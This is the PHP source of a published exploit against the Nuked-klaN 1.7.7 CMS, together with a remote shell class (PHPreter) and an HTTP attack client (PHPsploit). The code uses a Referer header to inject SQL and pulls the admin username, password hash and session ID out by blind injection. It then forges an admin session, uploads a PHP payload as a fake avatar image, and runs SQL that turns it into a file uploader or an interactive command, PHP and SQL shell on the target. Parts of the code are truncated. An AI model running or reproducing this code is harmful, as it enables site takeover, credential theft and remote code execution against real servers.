-# - -error_reporting(E_ALL ^ E_NOTICE); - -define('MSG_INFO', 1); -define('MSG_OKAY', 2); -define('MSG_ERROR', 3); -define('MSG_QUESTION', 4); - -define('AGENT', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16'); -define('IPBASE', '82.237.'); - -define('UPCODE', '\')) exit(\'--NOTDONE--\');fclose($h);exit(\'--DONE--\');}else{include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>'); -define('SHCODE', ''); - -$nk = new nk(); - -class nk -{ - var $proxy; - - var $user; - var $admin; - var $suser; - var $sadmin; - var $mode; - var $url; - var $year; - - var $ips = array(); - var $queries; - var $www; - - function nk() - { - $this->header(); - $this->usage(); - - $this->setParameters(); - $this->controlParameters(); - - $this->main(); - } - - function close() - { - $this->msg(); - exit(0); - } - - # Main function, what and when. - function main() - { - # Admin login not specified - if(!$this->sadmin) - { - $this->setQueries(0); - $this->checkStatsAccessibility(); - $this->sendInsertQuery(); - - # Got the credentials =) - if($this->getCredentials()) - { - $this->dumpCredentials(); - } - elseif($this->blindQueries()) - { - if($this->mode != 2 && !$this->admin['sid']) - { - $this->msg('There is no active admin session, try with "-mode 2"', MSG_ERROR); - exit(); - } - - $this->file = str_replace('$_SERVER[\'HTTP_SHELL\']', 'stripslashes($_SERVER[\'HTTP_SHELL\'])', $this->file); - } - # No attack worked - else - { - $this->msg('Exploit failed, stats might be disabled.', MSG_ERROR); - exit(); - } - } - - $this->makeadmin(); - $this->conclude(); - } - - # Define queries in function of the current mode - function setQueries($mode) - { - $this->queries = array(); - - if(!$mode) - { - # User queries - $this->queries['name'] = 'SELECT pseudo FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1'; - $this->queries['password'] = 'SELECT pass FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1'; - - # Session queries - 
if($this->mode != 2) - { - $this->queries['uid'] = 'SELECT id FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1'; - $this->queries['sid'] = 'SELECT id FROM sessions WHERE user_id=(SELECT id FROM users WHERE niveau=9 ORDER BY DATE ASC LIMIT 1) ORDER BY DATE DESC LIMIT 1'; - } - } - else - { - list($day, $month, $year) = explode(':', date('d:m:Y')); - $this->queries[] = 'ALTER TABLE block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;'; - $this->queries[] = 'UPDATE block SET type=0x2f2e2e2f2e2e2f2e2e2f00 WHERE type=0x6c6f67696e OR type LIKE 0x252f2e2e25 AND active!=0 LIMIT 1;'; - $this->queries[] = 'DELETE FROM stats_visitor WHERE (day=' . $day . ' AND month=' . $month . ' AND year=' . $year . ') OR year=' . $this->year . ' OR year=0;'; - } - - # Set the SQL prefix - foreach($this->queries as $k => $v) - $this->queries[$k] = str_replace('', $this->sprefix, $v); - } - - # Informs of the stats accessibility - function checkStatsAccessibility() - { - $this->msg('Checking statistics accessibility ...', MSG_INFO, false); - - $accessibility = $this->areStatsReachable(); - - if($accessibility == 1) - { - $this->msg('Statistics are reachable, but require authentification', MSG_OKAY); - - if(!$this->suser) - { - $this->msg('Please create an user and specify it using -user parameter', MSG_ERROR); - exit(); - } - else - { - $this->makeuser(); - } - } - elseif($accessibility == 0) - { - $this->msg('Statistics are reachable as a visitor', MSG_OKAY); - } - else - { - $this->msg('Statistics are NOT reachable or activated', MSG_ERROR); - exit(); - } - } - - # Determine if stats are accessible, and under which conditions - function areStatsReachable() - { - $this->wwwinit(0); - $this->www->addheader('Referer', 'http://test.com/'); - $this->www->get($this->url . 
'index.php?file=Stats&nuked_nude=visits&op=view_referer'); - - if(preg_match('#[^<]+#i', $this->www->getcontent())) - return -1; - if(preg_match('#[^<]+#i', $this->www->getcontent())) - return 1; - - if(!preg_match('#http://test\.com/#i', $this->www->getcontent())) - return -1; - - return 0; - } - - # Send the spoofed referer in order to insert interresting - # informations in the nuked_stats_visitors table - function sendInsertQuery() - { - $time = time()+60; - - $this->msg('Sending INSERT query ...', MSG_INFO, false); - - # End the first row - $sql = "http://google.com/', '', '', '', '', '0'), "; - - # For each query, a new row - foreach($this->queries as $key => $query) - { - $sql .= "('', '', '0.0.0.0', 'attack', 'Mozilla', 'Windows', CONCAT(''), '1', '1', '" .$this->year . "', '1', '$time'), "; - } - - # End this with the beginning of a row, to have a valid SQL query - $sql .= "('', '', '', '', '', '', '"; - - # Let's send it - $this->wwwinit(0); - $this->www->addheader('Referer', $sql); - $this->www->get($this->url); - - $this->msg('Sent INSERT query ', MSG_OKAY); - } - - # Get insert query result in stats page, credentials - function getCredentials() - { - $this->admin = array(); - - $this->msg('Retrieving credentials ...', MSG_INFO, false); - - $this->wwwinit(1); - $this->www->get($this->url . 'index.php?file=Stats&nuked_nude=visits&op=view_referer&oyear=' . $this->year); - - if(!preg_match_all('##Ui', $this->www->getcontent(), $data)) - { - $this->msg('Unable to reach credentials', MSG_ERROR); - return false; - } - - for($i=0;$iadmin[$data[1][$i]] = $data[2][$i]; - } - - $this->msg('Got the credentials =) ', MSG_OKAY); - - return true; - } - - # Dump $this->user content - function dumpCredentials() - { - $display = array - ( - 'User : ' => 'name', - 'Password : ' => 'password', - 'UserID : ' => 'uid', - 'SessionID : ' => 'sid', - ); - - foreach($display as $key => $value) - if($this->admin[$value]) - $this->msg($key . 
$this->admin[$value], MSG_OKAY); - } - - # Here we are on the second attack: we have to blind, but only - # critical information because it's pretty long - function blindQueries() - { - $this->msg('Switching to blind mode, be (very) patient ...', MSG_INFO); - - if($this->mode != 2) - { - unset($this->queries['name']); - unset($this->queries['password']); - } - - foreach($this->queries as $key => $query) - { - $length = $key == 'password' ? 32 : 20; - - if($key == 'sid') - { - $query = str_replace - ( - '(' . $this->queries['uid'] . ')', - "'" . $this->admin['uid'] . "'", - $query - ); - } - - switch($key) - { - case 'name': $display = 'User : '; break; - case 'password': $display = 'Password : '; break; - case 'sid': $display = 'SessionID : '; break; - case 'uid': $display = 'UserID : '; break; - } - - $this->msg($display, MSG_QUESTION, false); - if(!($this->admin[$key] = $this->blind($query, $length))) return true; - $this->msg($display . $this->admin[$key], MSG_OKAY); - } - - return true; - } - - # SQL Blind function - # Referer SQL field only supports 200 characters, - # so we use a special sql injection to be sure it - # will work fine and fast enought. - # - # 1. Charset - # 2. Dichotomy - # - function blind($query, $nbchars) - { - $result = ''; - - for($p=1;$p<=$nbchars;$p++) - { - $letter = ''; - $sql = "MID(($query),$p,1)"; - - if($this->blind_is($sql)) - { - if($this->blind_isChar($sql)) - { - if($this->blind_isMaj($sql)) - $charset = array(ord('A'), ord('Z')); - else - $charset = array(ord('a'), ord('z')); - } - else - $charset = array(ord('0'), ord('9')); - } - else - break; - - $add = $charset[0]; - - for($pos=$charset[1]-$charset[0];$pos>2;$pos=intval($pos/2+0.5)) - { - $s = 'ORD(' . $sql . ') BETWEEN ' . $add . ' AND ' . ($add+$pos); - if(!$this->blind_test($s)) $add += $pos; - } - - $letter = ''; - - for($i=$add;$i<=$add+$pos+1;$i++) - { - $s = 'ORD(' . $sql . ')=' . 
$i; - if($this->blind_test($s)) - { - $letter = chr($i); - break; - } - } - - $result .= $letter; - print $letter; - } - - return $result; - } - - function blind_is($sql) - { - return $this->blind_test("ORD($sql)!=0"); - } - - function blind_isChar($query) - { - return $this->blind_test("UPPER($query) BETWEEN 'A' AND 'Z'"); - } - - function blind_isMaj($query) - { - return $this->blind_test("ORD($query) BETWEEN 65 AND 90"); - } - - # Return true or false depending on the page result, before - # setting up PHPsploit and the referer - function blind_test($sql) - { - $site = $this->generateIP(); - $when = '&oday=' . date('d') . '&omonth=' . date('m') . '&oyear=' . date('Y'); - - $this->wwwinit(0); - $this->www->addheader('Referer', $this->year . $site . "' OR 1=1 AND $sql AND 'A'='A"); - - # If we have to be user to reach stats - if(sizeof($this->user)) - { - $this->www->get($this->url . 'index.php'); - $this->wwwinit(1); - } - - $this->www->get($this->url . 'index.php?file=Stats&nuked_nude=visits&op=view_referer' . $when); - - if(preg_match('#' . $this->year . $site . 
'[^<]+\s+([0-9]*)#i', $this->www->getcontent(), $data)) - { - if($data[1] > 0) - return true; - } - else - { - $this->msg('Error while blinding.', MSG_ERROR); - exit(); - } - } - - # Set up the admin - function makeadmin() - { - # The current user is now the admin - $this->user = $this->admin; - - # Determine if we have a session or just a name - if($this->mode == 2) - { - exit(); - } - elseif($this->sadmin) - { - $this->suser = $this->sadmin; - $this->makeuser(); - } - elseif($this->user['sid'] && $this->user['uid']) - { - $this->msg('Got a session, no login required', MSG_OKAY); - } - elseif($this->user['name'] && $this->user['password']) - { - $this->msg('Please crack the admin hash, and use -admin parameter', MSG_ERROR); - exit(); - } - else - { - $this->msg('How did you get there ?', MSG_ERROR); - exit(); - } - - $this->user['aid'] = $this->user['uid']; - $this->user['ip'] = '127.0.0.1'; - - $this->msg('Administrator status OK =)', MSG_OKAY); - } - - # Conclude the attack: spawn a shell or an uploader - function conclude() - { - # Initialise PHPsploit for the last time - $this->wwwinit(1); - $this->www->addheader('Referer', $this->url); - - # Actualize the queries - $this->setQueries(1); - - $this->uploadavatar(); - $this->sendqueries(); - $this->loadshell(); - } - - function uploadavatar() - { - $this->msg('Uploading avatar ...', MSG_INFO, false); - - $fmdt = array - ( - 'frmdt_url' => $this->url . 'index.php?file=User&op=update_pref', - 'fichiernom' => array - ( - 'frmdt_filename' => 'one.jpg', - 'frmdt_content' => $this->file, - ) - ); - - $this->www->formdata($fmdt); - $this->www->get($this->url . 'index.php?file=User&op=edit_pref'); - - if(!preg_match('#value="([^"]+\.jpg)"#U', $this->www->getcontent(), $match)) - { - $this->msg('Error while uploading avatar', MSG_ERROR); - exit(); - } - - $this->msg('Avatar successfully uploaded (' . basename($match[1]) . 
')', MSG_OKAY); - - $match = unpack('H*', $match[1]); - - $this->queries[1] = str_replace('', $match[1], $this->queries[1]); - } - - function sendqueries() - { - $this->msg('Sending SQL queries ', MSG_INFO, false); - - foreach($this->queries as $query) - { - $this->www->post($this->url . 'index.php?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $query); - $this->msg('.', 0, false); - } - - $this->msg('SQL queries sent ', MSG_OKAY); - } - - function loadshell() - { - if($this->mode == 0) - { - $this->www->addheader('Shell', '1'); - $this->www->get($this->url); - - if(strpos('--DONE--', $this->www->getcontent())) - $this->msg('File created. URL: ' . $this->url . 'w00t.php', MSG_OKAY); - else - { - # possible causes: safe_mode, open_basedir, file restrictions ... - $this->msg('File was not created', MSG_ERROR); - } - } - else - { - $this->msg('Shell spawned', MSG_OKAY); - $this->msg(); - $sql = array('conf.inc.php', '$global[\'db_host\']', '$global[\'db_user\']', '$global[\'db_password\']', '$global[\'db_name\']'); - new phpreter($this->url . 'index.php', '123456789(.*)123456789', 'cmd', $sql, false); - } - } - - # Login as a specified user, and obtain a $uid and a $sid - function createSession($user, $passwd, &$uid, &$sid) - { - $this->wwwinit(0); - $this->www->addheader('Referer', $this->url . 'index.php'); - $this->www->post($this->url . 'index.php?file=User&nuked_nude=index&op=login', "pseudo=$user&pass=$passwd&remember_me=ok"); - - preg_match('#nuked_sess_id=([a-z0-9]+)#i', $this->www->getheader(), $sid); - preg_match('#uid=([a-z0-9]+)#i', $this->www->getcontent(), $uid); - - $sid = $sid[1]; - $uid = $uid[1]; - - if($uid && $sid) - return true; - - return false; - } - - # Login user and set his informations - function makeuser() - { - list($user, $passwd) = explode(':', $this->suser); - - $this->user = array(); - - $this->msg('Logging in as ' . 
$user, MSG_INFO, false); - - if($this->createSession($user, $passwd, $uid, $sid)) - { - $this->user['name'] = $user; - $this->user['password'] = $passwd; - $this->user['uid'] = $uid; - $this->user['sid'] = $sid; - $this->user['ip'] = $this->generateIP(); - - $this->msg('Loggued in as ' . $user . ' (uid=' . $uid . ')', MSG_OKAY); - } - else - { - $this->msg('Unable to log in as ' . $user, MSG_ERROR); - exit(); - } - } - - # Initialize PHPsploit (with a new identity) - function wwwinit($mode) - { - $this->www->reset(); - $this->www->agent(AGENT); - - if($mode && sizeof($this->user)) - $this->wwwuser(); - else - $this->www->addheader('X-Forwarded-For', $this->generateIP()); - } - - # Set user cookies and headers - function wwwuser() - { - $cookies = array(); - - if($this->user['uid']) $cookies['user_id'] = $this->user['uid']; - if($this->user['sid']) $cookies['sess_id'] = $this->user['sid']; - if($this->user['aid']) $cookies['admin_session'] = $this->user['aid']; - - foreach($cookies as $k => $v) - $this->www->addcookie($this->cprefix . $k, $v); - - // yes it's not a cookie - $this->www->addheader('X-Forwarded-For', $this->user['ip']); - } - - # Make an IP which can be gethostbyaddr()'ed, for speed - # reasons - function generateIP() - { - do - { - $ip = IPBASE . rand(1, 20) . '.' . rand(1, 250); - } - while(in_array($ip, $this->ips)); - - $this->ips[] = $ip; - - return $ip; - } - - function msg($msg = '', $type = 0, $n = true) - { - $display = $n ? "\r" : ''; - - switch($type) - { - case MSG_INFO: $display .= '[*] '; break; - case MSG_OKAY: $display .= '[+] '; break; - case MSG_ERROR: $display .= '[-] '; break; - case MSG_QUESTION: $display .= '[?] '; break; - } - - $display .= $msg; - - $display .= $n ? 
"\n" : ''; - - print $display; - } - - function header() - { - $this->msg(); - $this->msg(' Nuked-klaN 1.7.7 and SP4.4 Multiple Vulnerabilities Exploit'); - $this->msg(' by Charles FOL '); - $this->msg(); - } - - function usage() - { - global $argc; - - if($argc<3) - { - $this->msg(' usage: ./nk_exploit.php -url [options]'); - $this->msg(); - $this->msg(' Options: -mode 0: Remote Upload (default)'); - $this->msg(' 1: Remote Code Execution'); - $this->msg(' 2: Admin Hash Extraction'); - $this->msg(' -admin If you have an admin account.'); - $this->msg(' -user If stats page need registration.'); - $this->msg(' -proxy If you want to use a proxy.'); - $this->msg(' -cprefix Cookie prefix (default: nuked_).'); - $this->msg(' -sprefix SQL prefix (default: nuked_).'); - $this->msg(' -file If you wanna upload a specific file'); - $this->msg(' else it will upload a simple uploader.'); - $this->msg(); - $this->msg(' eg: ./nk_exploit.php -url http://localhost/nk/ -admin real:passw0rd'); - $this->msg(' eg: ./nk_exploit.php -url http://localhost/nk/ -file cshell.php -proxy localhost:8118'); - - $this->close(); - } - } - - function setParameters() - { - $this->www = new phpsploit(); - $this->year = rand(1000, 1500); - $this->url = $this->getParameter('url', true); - $this->mode = $this->getParameter('mode', false, 0); - $this->suser = $this->getParameter('user', false); - $this->sadmin = $this->getParameter('admin', false); - $this->proxy = $this->getParameter('proxy', false); - $this->cprefix = $this->getParameter('cprefix', false, 'nuked_'); - $this->sprefix = $this->getParameter('sprefix', false, 'nuked_'); - $this->file = $this->getParameter('file', false); - } - - function controlParameters() - { - if($this->mode == 0) - { - if($this->file) - $this->file = file_get_contents($this->file); - else - $this->file = 'Error ".$_FILES[\'file\'][\'error\'' - . ']."
    ");else echo "
    File uploaded
    "; } ?>
    '; - - $this->file = str_replace('', str_replace("'", "\'", $this->file), UPCODE); - } - else - $this->file = SHCODE; - - if($this->proxy) - $this->www->proxy($this->proxy); - } - - function getParameter($parameter, $required = false, $default = '') - { - global $argv, $argc; - - for($i=0;$i<$argc;$i++) - { - if($argv[$i] == '-' . $parameter) - return $argv[$i+1]; - } - - if($required) - { - $this->msg('-' . $parameter . ' parameter is required.', MSG_ERROR); - $this->close(); - } - - return $default; - } -} - -# PHPreter (a bit modified). -# Find original version on http://real.o-n.fr/ - -/* - * Copyright (c) Charles FOL - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License - * as published by the Free Software Foundation; either version 2 - * of the License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. - * - * TITLE: PHPreter - * AUTHOR: Charles FOL - * VERSION: 1.0 - * LICENSE: GNU General Public License - * - * This is a really simple class with permits to exec SQL, PHP or CMD - * on a remote host using the HTTP "Shell" header. 
- * - * - * Sample code: - * [host][sql]# mode=cmd - * [host][cmd]# id - * uid=2176(u47170584) gid=600(ftpusers) - * - * [host][cmd]# mode=php - * [host][php]# echo phpversion(); - * 4.4.8 - * [host][php]# mode=sql - * [host][sql]# SELECT version(), user() - * -------------------------------------------------- - * version() | 5.0.51a-log - * user() | dbo225004932@74.208.16.148 - * -------------------------------------------------- - * - * [host][sql]# - * - */ - -class phpreter -{ - var $url; - var $host; - var $port; - var $page; - - var $mode; - - var $ssql; - - var $prompt; - var $phost; - - var $regex; - var $data; - - /** - * __construct() - * - * @param url The url of the remote shell. - * @param regexp The regex to catch cmd result. - * @param mode Mode: php, sql or cmd. - * @param sql An array with the file to include, - * and sql vars - * @param clear Determines if clear() is called - * on startup - */ - function phpreter($url, $regexp='^(.*)$', $mode='cmd', $sql=array(), $clear=true) - { - $this->url = $url; - - $this->regex = '#'.$regexp.'#is'; - - # - # Set data - # - - $infos = parse_url($this->url); - $this->host = $infos['host']; - $this->port = isset($infos['port']) ? $infos['port'] : 80; - $this->page = $infos['path']; - - # www.(site).com - $host_tmp = explode('.',$this->host); - $this->phost = $host_tmp[ count($host_tmp)-2 ]; - - # - # Set up MySQL connection string - # - if(!sizeof($sql)) - $this->ssql = ''; - elseif(sizeof($sql) == 5) - { - $this->ssql = "include('$sql[0]');" - . "mysql_connect($sql[1], $sql[2], $sql[3]);" - . "mysql_select_db($sql[4]);"; - } - else - { - $this->ssql = "" - . "mysql_connect('$sql[0]', '$sql[1]', '$sql[2]');" - . 
"mysql_select_db('$sql[3]');"; - } - - $this->setmode($mode); - - # - # Main Loop - # - - if($clear) $this->clear(); - print $this->prompt; - - while( !preg_match('#^(quit|exit|close)$#i', ($cmd = trim(fgets(STDIN)))) ) - { - # change mode - if(preg_match('#^(set )?mode(=| )(sql|cmd|php)$#i',$cmd,$array)) - $this->setmode($array[3]); - - # clear data - elseif(preg_match('#^clear$#i',$cmd)) - $this->clear(); - - # else - else print $this->exec($cmd); - - print $this->prompt; - } - } - - /** - * clear() - * Just clears ouput, printing '\n'x50 - */ - function clear() - { - print str_repeat("\n", 50); - return 0; - } - - /** - * setmode() - * Set mode (PHP, CMD, SQL) - * You don't have to call it. - * use mode=[php|cmd|sql] instead, - * in the prompt. - */ - function setmode($newmode) - { - $this->mode = strtolower($newmode); - $this->prompt = '['.$this->phost.']['.$this->mode.']# '; - - switch($this->mode) - { - case 'cmd': - $this->data = 'system(\'\');'; - break; - case 'php': - $this->data = ''; - break; - case 'sql': - $this->data = $this->ssql - . '$q = mysql_query(\'\') or print(str_repeat("-",50)."\n".mysql_error()."\n");' - . 'print str_repeat("-",50)."\n";' - . 'while($r=mysql_fetch_array($q,MYSQL_ASSOC))' - . '{' - . 'foreach($r as $k=>$v) print " ".$k.str_repeat(" ", (20-strlen($k)))."| $v\n";' - . 'print str_repeat("-",50)."\n";' - . '}'; - break; - } - return $this->mode; - } - - /** - * exec() - * Execute any query and catch the result. - * You don't have to call it. - */ - function exec($cmd) - { - if(!strlen($this->data)) $shell = $cmd; - else $shell = str_replace('', addslashes($cmd), $this->data); - - $fp = fsockopen($this->host, $this->port, $errno, $errstr, 30); - - $req = "GET " . $this->page . " HTTP/1.1\r\n"; - $req .= "Host: " . $this->host . ( $this->port!=80 ? ':'.$this->port : '' ) . 
"\r\n"; - $req .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14\r\n"; - $req .= "X-Forwarded-For: 127.0.0.1\r\n"; // here is the mod. - $req .= "Shell: $shell\r\n"; - $req .= "Connection: close\r\n\r\n"; - - fputs($fp, $req); - - $content = ''; - while(!feof($fp)) $content .= fgets($fp, 128); - - fclose($fp); - - # Remove headers - $data = explode("\r\n\r\n", $content); - $headers = array_shift($data); - $content = implode("\r\n\r\n", $data); - - if(preg_match("#Transfer-Encoding:.*chunked#i", $headers)) - $content = $this->unchunk($content); - - preg_match($this->regex, $content, $data); - - if($data[1][ strlen($data)-1 ] != "\n") $data[1] .= "\n"; - - return $data[1]; - } - - /** - * unchunk() - * This function aims to remove chunked content's sizes which - * are put by the apache server when it uses chunked - * transfert-encoding. - */ - function unchunk($data) - { - $dsize = 1; - $offset = 0; - - while($dsize>0) - { - $hsize_size = strpos($data, "\r\n", $offset) - $offset; - - $dsize = hexdec(substr($data, $offset, $hsize_size)); - - # Remove $hsize\r\n from $data - $data = substr($data, 0, $offset) . substr($data, ($offset + $hsize_size + 2) ); - - $offset += $dsize; - - # Remove the \r\n before the next $hsize - $data = substr($data, 0, $offset) . substr($data, ($offset+2) ); - } - - return $data; - } -} - -# PHPsploitClass - -/* - * - * Copyright (C) darkfig - * - * This program is free software; you can redistribute it and/or - * modify it under the terms of the GNU General Public License - * as published by the Free Software Foundation; either version 2 - * of the License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. 
- * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. - * - * TITLE: PhpSploit Class - * REQUIREMENTS: PHP 4 / PHP 5 - * VERSION: 2.0 - * LICENSE: GNU General Public License - * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt - * FILENAME: phpsploitclass.php - * - * CONTACT: gmdarkfig@gmail.com (french / english) - * GREETZ: Sparah, Ddx39 - * - * DESCRIPTION: - * The phpsploit is a class implementing a web user agent. - * You can add cookies, headers, use a proxy server with (or without) a - * basic authentification. It supports the GET and the POST method. It can - * also be used like a browser with the cookiejar() function (which allow - * a server to add several cookies for the next requests) and the - * allowredirection() function (which allow the script to follow all - * redirections sent by the server). It can return the content (or the - * headers) of the request. Others useful functions can be used for debugging. - * A manual is actually in development but to know how to use it, you can - * read the comments. 
- * - * CHANGELOG: - * - * [2007-06-10] (2.0) - * * Code: Code optimization - * * New: Compatible with PHP 4 by default - * - * [2007-01-24] (1.2) - * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) - * * New: multipart/form-data enctype is now supported - * - * [2006-12-31] (1.1) - * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) - * * New: You can now call the getheader() / getcontent() function without parameters - * - * [2006-12-30] (1.0) - * * First version - * - */ - -class phpsploit -{ - var $proxyhost; - var $proxyport; - var $host; - var $path; - var $port; - var $method; - var $url; - var $packet; - var $proxyuser; - var $proxypass; - var $header; - var $cookie; - var $data; - var $boundary; - var $allowredirection; - var $last_redirection; - var $cookiejar; - var $recv; - var $cookie_str; - var $header_str; - var $server_content; - var $server_header; - - - /** - * This function is called by the - * get()/post()/formdata() functions. - * You don't have to call it, this is - * the main function. - * - * @access private - * @return string $this->recv ServerResponse - * - */ - function sock() - { - if(!empty($this->proxyhost) && !empty($this->proxyport)) - $socket = @fsockopen($this->proxyhost,$this->proxyport); - else - $socket = @fsockopen($this->host,$this->port); - - if(!$socket) - die("Error: Host seems down"); - - if($this->method=='get') - $this->packet = 'GET '.$this->url." HTTP/1.1\r\n"; - - elseif($this->method=='post' or $this->method=='formdata') - $this->packet = 'POST '.$this->url." 
HTTP/1.1\r\n"; - - else - die("Error: Invalid method"); - - if(!empty($this->proxyuser)) - $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; - - if(!empty($this->header)) - $this->packet .= $this->showheader(); - - if(!empty($this->cookie)) - $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; - - $this->packet .= 'Host: '.$this->host."\r\n"; - $this->packet .= "Connection: Close\r\n"; - - if($this->method=='post') - { - $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; - $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; - $this->packet .= $this->data."\r\n"; - } - elseif($this->method=='formdata') - { - $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; - $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; - $this->packet .= $this->data; - } - - $this->packet .= "\r\n"; - $this->recv = ''; - - fputs($socket,$this->packet); - - while(!feof($socket)) - $this->recv .= fgets($socket); - - fclose($socket); - - if($this->cookiejar) - $this->getcookie(); - - if($this->allowredirection) - return $this->getredirection(); - else - return $this->recv; - } - - - /** - * This function allows you to add several - * cookies in the request. - * - * @access public - * @param string cookn CookieName - * @param string cookv CookieValue - * @example $this->addcookie('name','value') - * - */ - function addcookie($cookn,$cookv) - { - if(!isset($this->cookie)) - $this->cookie = array(); - - $this->cookie[$cookn] = $cookv; - } - - - /** - * This function allows you to add several - * headers in the request. 
- * - * @access public - * @param string headern HeaderName - * @param string headervalue Headervalue - * @example $this->addheader('Client-IP', '128.5.2.3') - * - */ - function addheader($headern,$headervalue) - { - if(!isset($this->header)) - $this->header = array(); - - $this->header[$headern] = $headervalue; - } - - - /** - * This function allows you to use an - * http proxy server. Several methods - * are supported. - * - * @access public - * @param string proxy ProxyHost - * @param integer proxyp ProxyPort - * @example $this->proxy('localhost',8118) - * @example $this->proxy('localhost:8118') - * - */ - function proxy($proxy,$proxyp='') - { - if(empty($proxyp)) - { - $proxarr = explode(':',$proxy); - $this->proxyhost = $proxarr[0]; - $this->proxyport = (int)$proxarr[1]; - } - else - { - $this->proxyhost = $proxy; - $this->proxyport = (int)$proxyp; - } - - if($this->proxyport > 65535) - die("Error: Invalid port number"); - } - - - /** - * This function allows you to use an - * http proxy server which requires a - * basic authentification. Several - * methods are supported: - * - * @access public - * @param string proxyauth ProxyUser - * @param string proxypass ProxyPass - * @example $this->proxyauth('user','pwd') - * @example $this->proxyauth('user:pwd'); - * - */ - function proxyauth($proxyauth,$proxypass='') - { - if(empty($proxypass)) - { - $posvirg = strpos($proxyauth,':'); - $this->proxyuser = substr($proxyauth,0,$posvirg); - $this->proxypass = substr($proxyauth,$posvirg+1); - } - else - { - $this->proxyuser = $proxyauth; - $this->proxypass = $proxypass; - } - } - - - /** - * This function allows you to set - * the 'User-Agent' header. - * - * @access public - * @param string useragent Agent - * @example $this->agent('Firefox') - * - */ - function agent($useragent) - { - $this->addheader('User-Agent',$useragent); - } - - - /** - * This function returns the headers - * which will be in the next request. 
- * - * @access public - * @return string $this->header_str Headers - * @example $this->showheader() - * - */ - function showheader() - { - $this->header_str = ''; - - if(!isset($this->header)) - return; - - foreach($this->header as $name => $value) - $this->header_str .= $name.': '.$value."\r\n"; - - return $this->header_str; - } - - - /** - * This function returns the cookies - * which will be in the next request. - * - * @access public - * @return string $this->cookie_str Cookies - * @example $this->showcookie() - * - */ - function showcookie() - { - $this->cookie_str = ''; - - if(!isset($this->cookie)) - return; - - foreach($this->cookie as $name => $value) - $this->cookie_str .= $name.'='.$value.'; '; - - return $this->cookie_str; - } - - - /** - * This function returns the last - * formed http request. - * - * @access public - * @return string $this->packet HttpPacket - * @example $this->showlastrequest() - * - */ - function showlastrequest() - { - if(!isset($this->packet)) - return; - else - return $this->packet; - } - - - /** - * This function sends the formed - * http packet with the GET method. - * - * @access public - * @param string url Url - * @return string $this->sock() - * @example $this->get('localhost/index.php?var=x') - * @example $this->get('http://localhost:88/tst.php') - * - */ - function get($url) - { - $this->target($url); - $this->method = 'get'; - return $this->sock(); - } - - - /** - * This function sends the formed - * http packet with the POST method. - * - * @access public - * @param string url Url - * @param string data PostData - * @return string $this->sock() - * @example $this->post('http://localhost/','helo=x') - * - */ - function post($url,$data) - { - $this->target($url); - $this->method = 'post'; - $this->data = $data; - return $this->sock(); - } - - - /** - * This function sends the formed http - * packet with the POST method using - * the multipart/form-data enctype. 
- * - * @access public - * @param array array FormDataArray - * @return string $this->sock() - * @example $formdata = array( - * frmdt_url => 'http://localhost/upload.php', - * frmdt_boundary => '123456', # Optional - * 'var' => 'example', - * 'file' => array( - * frmdt_type => 'image/gif', # Optional - * frmdt_transfert => 'binary' # Optional - * frmdt_filename => 'hello.php, - * frmdt_content => '')); - * $this->formdata($formdata); - * - */ - function formdata($array) - { - $this->target($array[frmdt_url]); - $this->method = 'formdata'; - $this->data = ''; - - if(!isset($array[frmdt_boundary])) - $this->boundary = 'phpsploit'; - else - $this->boundary = $array[frmdt_boundary]; - - foreach($array as $key => $value) - { - if(!preg_match('#^frmdt_(boundary|url)#',$key)) - { - $this->data .= str_repeat('-',29).$this->boundary."\r\n"; - $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; - - if(!is_array($value)) - { - $this->data .= "\r\n\r\n".$value."\r\n"; - } - else - { - $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n"; - - if(isset($array[$key][frmdt_type])) - $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n"; - - if(isset($array[$key][frmdt_transfert])) - $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n"; - - $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; - } - } - } - - $this->data .= str_repeat('-',29).$this->boundary."--\r\n"; - return $this->sock(); - } - - - /** - * This function returns the content - * of the server response, without - * the headers. 
